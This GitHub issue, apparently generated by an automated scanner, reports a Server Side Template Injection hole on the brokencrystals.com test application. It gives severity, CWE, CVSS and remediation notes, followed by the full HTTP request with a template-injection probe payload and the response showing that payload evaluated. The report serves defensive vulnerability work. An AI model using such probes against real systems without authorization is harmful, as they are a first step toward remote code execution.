Skip to content

SSTI - Server Side Template Injection #10

Description

@bright-security

SSTI - Server Side Template Injection

Severity: High Discovered: 10 of October-2022, 11:12 PM

CWE ID

CWE-74

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Details

SSTI (Server Side Template Injection) is vulnerability that is exploited by malformed user input which allows embedding user input into different application without proper validation. The highest possibility of this vulnerability is to create a path for remote code execution capabilities and be exploited by malicious subjects. Identification of this vulnerability is possible with observation of the invalid syntax in the input with an error messages displayed after creating a response.

Possible exposure

Execute Unauthorized Code or Commands

Remediation suggestions

To protect against this type of attack, you shall validate input before passing to template directive and create a safe environment.

Request

POST https://brokencrystals.com/api/render HTTP/1.1
Accept: application/json, text/plain, */*
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Content-Type: text/plain
Cookie: bc-calls-counter=1665443548282; connect.sid=wi7k_QEXSv2mytpWaTKNyd_1wk1LQvfh.HhvHOpsekTEV3vmOg45ZU0IvN%2BxQF2Ub1xmmkjpeDiI
Accept-Encoding: identity
Content-Length: 56

{{="+1"}} {{=5589}} {{=55488}} {{=55}}{{=518794+564180}}

Response

HTTP/1.1 201
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:28 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 23
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443548314
Cache-Control: public, max-age=99999

+1 5589 55488 551082974

External links

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions